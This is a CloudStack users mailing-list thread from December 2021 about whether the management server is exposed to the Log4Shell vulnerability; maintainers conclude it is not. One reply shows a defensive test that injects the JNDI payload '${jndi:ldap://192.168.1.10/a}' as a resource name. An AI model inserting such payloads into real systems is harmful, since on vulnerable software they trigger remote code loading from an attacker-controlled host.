Hi Serge, We've just posted the advisory which refers to log4j developer's note and slf4j project advisory. In addition, I performed the following test:
1. To test log4j RCE/CVE I found a resource whose name is printed by a logger, such as: https://github.com/apache/cloudstack/blob/main/server/src/main/java/org/apache/cloudstack/affinity/AffinityGroupServiceImpl.java#L164 2. I created the resource, an affinity group with name "${jndi:ldap://192.168.1.10/a<http://192.168.1.10/a>}" and tailed my webserver running on 192.168.1.10. The following was in CloudStack logs: 2021-12-11 08:39:46,265 DEBUG [o.a.c.a.AffinityGroupServiceImpl] (qtp1263668904-12808:ctx-d26b3d51 ctx-618e7d31) (logid:19557a1b) Created affinity group =${jndi:ldap://192.168.1.10/a<http://192.168.1.10/a>} However, the webserver logs has no error or access requests on /a path 3. Upon unzipping the 4.15.2 and 4.16.0 mgmt server jars, I didn't find the Jndi lookup class: root@cloudpi:/usr/share/cloudstack-management/lib/tmp# find . | grep JndiLookup ./org/springframework/ejb/config/JndiLookupBeanDefinitionParser.class ./org/springframework/jndi/JndiLookupFailureException.class Regards. ________________________________ From: Bs Serge <sergeb...@gmail.com> Sent: Monday, December 13, 2021 15:17 To: users@cloudstack.apache.org <users@cloudstack.apache.org> Subject: Re: Log4j in Cloudstack Daan, Thanks for the update, I can see the default log4j configuration uses 1.2.27 : <!-- Logging versions --> <cs.log4j.version>1.2.17</cs.log4j.version> <cs.log4j.extras.version>1.2.17</cs.log4j.extras.version> <cs.logging.version>1.1.1</cs.logging.version> We'll be waiting for the official statement. Best Regards, On Mon, Dec 13, 2021 at 11:12 AM Daan Hoogland <daan.hoogl...@gmail.com> wrote: > Serge, > A official statement should be coming out soon, but I think it is safe to > say the ACS is not impacted, for sure with the default log4j configuration. > The version we use is not impacted. A colleague PMC member did an exploit > attempt and showed it failing. If you are unsure [1] describes what we feel > is applicable to Cloudstack as well.. > > [1] http://slf4j.org/log4shell.html > > On Mon, Dec 13, 2021 at 9:55 AM Bs Serge <sergeb...@gmail.com> wrote: > > > Hi all, > > > > I’m sure all of you are aware of what’s going with the Log4j security > > vulnerability, If not then : > > > > - https://www.wired.com/story/log4j-flaw-hacking-internet/ > > - > > > > > https://logging-apache-org.translate.goog/log4j/2.x/security.html?_x_tr_sl=de&_x_tr_tl=en&_x_tr_hl=en-US > > > > So some of us are wondering : > > > > Does it affect some versions of the management server installation? and > > What can one do to make sure that they are safe from this vulnerability? > > > > Best Regards, > > > > > -- > Daan >
